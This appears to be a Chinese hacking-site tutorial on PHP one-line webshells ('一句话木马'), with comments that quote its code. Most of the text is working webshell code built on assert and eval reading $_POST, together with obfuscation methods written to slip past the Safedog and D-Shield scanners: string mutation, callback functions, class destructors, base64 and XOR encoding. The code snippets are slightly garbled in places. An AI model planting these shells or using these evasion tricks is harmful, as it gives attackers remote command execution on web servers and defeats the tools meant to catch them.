揭秘一句话木马的套路

揭秘一句话木马的套路

黑客安全hacker2019-10-01 18:26:2415893A+A-

  关于 eval 函数在 php 给出的官方说明是:

  eval是一个语言构造器而不是一个函数,不能被 可变函数 调用

  可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行。

  通俗的说比如你 这样是不行的 也造就了用 eval 的话达不到 assert 的灵活,但是在 以上 assert 已经不行。

  关于 assert 函数

  assert() 回调函数在构建自动测试套件的时候尤其有用,因为它们允许你简易地捕获传入断言的代码,并包含断言的位置信息。当信息能够被其他方法捕获,使用断言可以让它更快更方便!

  0x03 字符串变形

  字符串变形多数用于 BYPASS 安全狗,相当对于 D 盾,安全狗更加重视“形”。

  一个特殊的变形就能绕过安全狗,看看 PHP 手册,有着很多关于操作字符串的函数:

  ucwords() //函数把字符串中每个单词的首字符转换为大写。

  ucfirst() //函数把字符串中的首字符转换为大写。

  trim() //函数从字符串的两端删除空白字符和其他预定义字符。

  substr_replace() //函数把字符串的一部分替换为另一个字符串

  substr() //函数返回字符串的一部分。

  strtr() //函数转换字符串中特定的字符。

  strtoupper() //函数把字符串转换为大写。

  strtolower() //函数把字符串转换为小写。

  strtok() //函数把字符串分割为更小的字符串

  str_rot13() //函数对字符串执行 ROT13 编码。

  由于 PHP 的灵活性操作字符串的函数很多,我这里就不一一列举了。

  用 substr_replace() 函数变形 assert 达到免杀的效果:

  $a = substr_replace("assexx","rt",4);

  $a($_POST['x']);

  ?>

  其他函数类似 不一一列举了。

  0x04 定义函数绕过

  定义一个函数把关键词分割达到 bypass 效果:

  function kdog($a){

  $a($_POST['x']);

  }

  kdog(assert);

  ?>

  反之:

  function kdog($a){

  assert($a);

  }

  kdog($_POST[x]);

  ?>

  效果一样,这种绕过方法,对安全狗还是比较有效的 在 d 盾面前就显得小儿科了,不过后面会讲到如何用定义函数的方法来绕过 d 盾。

  0x05 回调函数

  call_user_func_array()

  call_user_func()

  array_filter()

  array_walk()

  array_map()

  registregister_shutdown_function()

  register_tick_function()

  filter_var()

  filter_var_array()

  uasort()

  uksort()

  array_reduce()

  array_walk()

  array_walk_recursive()

  回调函数大部分已经被安全软件加入全家桶套餐,所以找到一个生僻的不常用的回调函数来执行,比如:

  forward_static_call_array(assert,array($_POST[x]));

  ?>

  这个函数能过狗,但是 D 盾显示是一级。

  00x06 回调函数变形

  前面说过众多回调函数已经被加入豪华套餐了,怎么绕过呢,其实也很简单 那就是定义个函数 或者类来调用。

  定义一个函数:

  function test($a,$b){

  array_map($a,$b);

  }

  test(assert,array($_POST['x']));

  ?>

  定义一个类:

  class loveme {

  var $a;

  var $b;

  function __construct($a,$b) {

  $this->a=$a;

  $this->b=$b;

  }

  function test() {

  array_map($this->a,$this->b);

  }

  }

  $p1=new loveme(assert,array($_POST['x']));

  $p1->test();

  ?

  0x07 特殊字符干扰

  特殊字符干扰,要求是能干扰到杀软的正则判断,还要代码能执行, 网上广为流传的连接符。

  初代版本:

  $a = $_REQUEST['a'];

  $b = null;

  eval($b.$a);

  ?>

  不过已经不能免杀了,利用适当的变形即可免杀,如:

  $a = $_POST['a'];

  $b = "\n";

  eval($b.=$a);

  ?>

  其他方法大家尽情发挥如” ”, 函数返回,类,等等。

  除了连接符号 还有个命名空间的东西  具体大家可以看看 php 手册:

  function dog($a){

  \assert($a);

  }

  dog($_POST[x]);

  ?>

  当然还有其他的符号熟读 PHP 手册就会有不一样的发现。

  0x08 数组

  把执行代码放入数组中执行绕过:

  $a = substr_replace("assexx","rt",4);

  $b=[''=>$a($_POST['q'])];

  ?>

  多维数组:

  $b = substr_replace("assexx","rt",4);

  $a = array($arrayName = array('a' => $b($_POST['q'])));

  ?>

  0x09 类

  说到类肯定要搭配上魔术方法比如 destruct(),construct()。

  直接上代码:

  class me

  {

  public $a = '';

  function __destruct(){

  assert("$this->a");

  }

  }

  $b = new me;

  $b->a = $_POST['x'];

  ?>

  用类把函数包裹,D 盾对类查杀较弱。

  0x10 编码绕过

  用 php 的编码函数,或者用异或等等。

  简单的 base64_decode, 其中因为他的正则匹配可以加入一些下划线干扰杀软:

  $a = base64_decode("YXNz+ZX____J____0");

  $a($_POST[x]);

  ?>

  或:

  $a= ("!"^"@").'ssert';

  $a($_POST[x]);

  ?>

  0x11 无字符特征马

  对于无特征马这里我的意思是 无字符特征。

  1、利用异或, 编码等方式,例如 p 神博客的:

  $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';

  $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';

  $___=$$__;

  $_($___[_]); // assert($_POST[_]);

  2、利用正则匹配字符,如 Tab 等,然后转换为字符。

  3、利用 POST 包获取关键参数执行,例如:

  $decrpt = $_POST['x'];

  $arrs = explode("|", $decrpt)[1];

  $arrs = explode("|", base64_decode($arrs));

  call_user_func($arrs[0],$arrs[1]);

  ?>

  0x12 PHP7.1 后 webshell 何去何从

  在 后面我们已经不能使用强大的 assert 函数了用 eval 将更加注重特殊的调用方法和一些字符干扰, 后期大家可能更加倾向使用大马。

  总结

  对于安全狗杀形,d 盾杀参的思路来绕过。生僻的回调函数, 特殊的加密方式, 以及关键词的后传入都是不错的选择。

  对于关键词的后传入对免杀安全狗,d 盾,河马等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化。

  用户可以对传出的 post 数据进行自定义脚本加密,再由 webshell 进行解密获取参数,那么以现在的软 WAF 查杀能力。

  几乎为 0,安全软件也需要与时俱进了。

揭秘一句话木马的套路 第1张

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 鹿岛沐白2022-05-28 04:18:15
  • ;%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST'
  • 边侣栖迟2022-05-28 05:25:57
  • = substr_replace("assexx","rt",4);  $b=[''=>$a($_POST['q'])];  ?>  多维数组:  $b = substr_replace("assex
  • 丑味鸠骨2022-05-28 04:23:37
  • public $a = '';  function __destruct(){  assert("$this->a");  }  }  $b = new me;  $b->a = $_POST['x'];

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理